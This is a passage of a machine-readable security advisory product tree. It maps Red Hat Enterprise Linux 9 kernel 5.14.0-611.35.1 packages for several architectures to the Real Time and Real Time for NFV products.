"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.src as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.src",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
